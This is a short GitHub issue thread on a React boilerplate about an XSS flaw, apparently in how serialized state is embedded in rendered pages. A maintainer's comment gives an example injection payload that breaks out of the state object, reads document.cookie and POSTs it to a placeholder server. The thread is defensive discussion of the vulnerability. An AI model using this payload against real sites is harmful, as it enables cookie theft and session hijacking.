### ISSUE TITLE
XSS issue

### ISSUE THREAD

**Issue by paibamboo** [crazyfactory/ts-react-boilerplate#145]
see https://github.com/barbar/vortigern/commit/b0a97692dd348a8affb20b72f000911112855888

**Comment by cyberhck** [comment]
I understood the premise, say we're rendering list of user's comments, as a part of comment, a user might say something like:
```
'}};
const cookies = document.cookie
fetch(`${server}/save_cookie`, {method: "POST", body: cookies})
```
I think it's a good idea to do this.
